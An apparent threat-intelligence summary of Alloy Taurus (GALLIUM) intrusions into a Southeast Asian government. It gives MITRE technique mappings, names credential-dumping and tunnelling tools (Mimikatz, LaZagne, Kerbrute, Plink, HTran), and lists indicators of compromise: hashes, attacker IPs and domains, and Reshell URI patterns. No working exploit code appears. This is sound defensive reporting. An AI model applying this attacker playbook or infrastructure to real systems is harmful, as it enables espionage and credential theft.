Threat Research

Persistent Attempts at Cyberespionage Against Southeast Asian Government Target Have Links to Alloy Taurus

Securonix

Two-wave or multiwave intrusions targeted a Southeast Asian government, with a moderate confidence attribution to Alloy Taurus (GALLIUM) operating on behalf of Chinese state interests. The operations exploited Exchange Server vulnerabilities to deploy web shells and a range of backdoors and tools to establish a long-term foothold and expand within compromised networks. #AlloyTaurus #GALLIUM #ChinaChopper #SoftEtherVPN #CobaltStrike #QuasarRAT #HDoor #Gh0stCringe #Winnti #Reshell #Zapoa #CL-STA-0045

Keypoints

  • Alloy Taurus (GALLIUM) is linked to the CL-STA-0045 activity targeting a Southeast Asian government with multiwave intrusions.
  • Initial access and persistence were gained by exploiting Exchange Server vulnerabilities and deploying web shells (notably China Chopper).
  • Attackers deployed a wide toolset (Reshell, Zapoa, Gh0stCringe, Quasar RAT, HDoor, Winnti variant) and used Cobalt Strike beacons and LOLBAS techniques to expand access.
  • Credential theft and lateral movement followed, including Kerbrute brute forcing, SAM hive access, Lsass dumping, NTLM downgrade attempts, and movement via AnyDesk and SoftEther VPN.
  • Less-visible techniques included reverse SSH tunneling (HTran, Plink), PowerShell-enabled tool downloads, WMI usage, and PowerCat/Netcat-like utilities for C2 and data transfer.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The attackers exploited vulnerabilities in Exchange Servers to deploy a large number of web shells. [‘…capitalized on vulnerabilities in Exchange Servers to deploy a large number of web shells….’]
  • [T1059.003] Windows Command Shell – Reconnaissance commands were run from the shell, including whoami, ipconfig, dir, arp and net. [‘…running reconnaissance commands and tools (e.g., whoami, ipconfig, dir, arp and net, NBTScan)…’]
  • [T1082] System Information Discovery – The intrusions included commands used to gather system information during reconnaissance. [‘…whoami, ipconfig, dir, arp and net…’]
  • [T1136] Create Account – Administrative accounts were created (Admin$, Back$, infoma$, testuser) to maintain footholds. [‘…creating several administrative accounts (named Admin$, Back$, infoma$ and testuser).’]
  • [T1003] OS Credential Dumping – Credential dumping activities included LSASS dumping, Mimikatz, LaZagne, SAM hive access and NTLM downgrade attempts. [‘…dumping Lsass; Mimikatz… NTLM downgrade attack…’]
  • [T1047] Windows Management Instrumentation – The attackers used WMI and PowerShell in their operations. [‘…The attackers used Windows Management Instrumentation (WMI) and PowerShell…’]
  • [T1021] Remote Services – Lateral movement leveraged SoftEther VPN and AnyDesk (with a default password) to reach target assets. [‘…abusing the remote administration tool AnyDesk…’]
  • [T1572] Protocol Tunneling – Reverse SSH tunneling enabled direct RDP to compromised hosts via HTran and Plink. [‘…established a reverse Secure Shell (SSH) tunnel… to tunnel RDP connections…’]
  • [T1218] Signed Binary Proxy Execution – LOLBAS technique using Shell32.dll to run Cobalt Strike beacons. [‘…living-off-the-land binaries and scripts (LOLBAS) method of abusing the Windows Shell Common DLL (Shell32.dll)…’]
  • [T1113] Screen Capture – Quasar RAT capabilities include screen capture. [‘Capturing screenshots’]
  • [T1056] Input Capture – Quasar RAT capabilities include keylogging. [‘Keylogging’]
  • [T1059.001] PowerShell – PowerShell was used to download tools and execute commands. [‘…PowerShell with the following command line.’]

Indicators of Compromise

Web Shells

  • [File Hash] Web Shells – b87c125c8c3bf43096690bf74df960e2c0120654635c4ea715039fbe9115ecef, 009a9d1609592abe039324da2a8a69c4a305ca999920bf6bbef839273516783a, and 3 more hashes

Reshell Backdoor

  • [File Hash] Reshell Backdoor – 4cb020a66fdbc99b0bce2ae24d5684685e2b1e9219fbdfda56b3aace4e8d5f66

Zapoa Backdoor

  • [File Hash] Zapoa Backdoor – 128bc34ee9d907d017f2e6f8fbbba24c3e51ed5a2fdba417ba893b496c8c18a7

Cobalt Strike

  • [File Hash] Cobalt Strike – Fec2d328462c944e85dd112e61c97d3e67a39f3c83c59e07410d228c7222d153, 99d0764248491f44709bd000104f6f99e53c9de8d55649b45112320d7bc4deed, 9242846351a65655e93ed2aeaf36b535ff5b79ddf76c33d54089d9005a66265b

Quasar RAT

  • [File Hash] Quasar RAT – 244cb0f526c2c99be0bf822463cd338630afa12ab32cc9b6cfd6e85fa315a478, 3e5c992b2be98efd3de5b13969900f207665116063a889b1c763371d4104f7f9

HDoor

  • [File Hash] HDoor – bd5dcf5911f959dd79de046d151e8a4aed3b854a322135acc37e3edb3643d0e2

Gh0stCringe RAT

  • [File Hash] Gh0stCringe RAT – f602bd56d6b4bf040956b86ed030643523a8b6611a21b5aafeaa82478820c395, d3b8f10f25545bed7d661b6a80be53356c00947800c7e53f050cb15b1f9b953b

Winnti-Related Backdoor

  • [File Hash] Winnti-Related Backdoor – a6b33cf73dd85c18577f58a75802ea0820f11aba88fac23ee3794fac1f4bacfa, 0d0dd41677ff0d7d648f8563db3a4b4844d86d70562d844bad1983333ae5633d

Fscan

  • [File Hash] Fscan – c27f0e68bc7f2ec2eede8a8e08fa341d41d5d2d0fb2b74260679a5504115947e

WebScan

  • [File Hash] WebScan – dbdd0f4bf1f217d794738b7d4f83483a5b3579be8791a7e2f2a62ec3e839be3c

Kerbrute

  • [Domain/Hash] Kerbrute – 5aa035ebc3359ee8517d99569c8881fcb7f48ab7e9a2f101f7e7ec23e636c79b

LsassUnhooker

  • [File Hash] LsassUnhooker – 225e5818dc7e7b23110f64fbb718c1792ad93ba7eb893bfbee96cdb13180fbf7

InternalMonologue.exe

  • [File Hash] InternalMonologue.exe – c74897b1e986e2876873abb3b5069bf1b103667f7f0e6b4581fbda3fd647a74a

Infrastructure

  • [IP] 159.223.85.37, 156.251.162.29
  • [Domain] Shell.cdn-sina.tw, images.cdn-sina.tw

Reshell URI Pattern

  • [URI] /sbName/, /Sleep/hostname=

Read more: https://unit42.paloaltonetworks.com/alloy-taurus-targets-se-asian-government/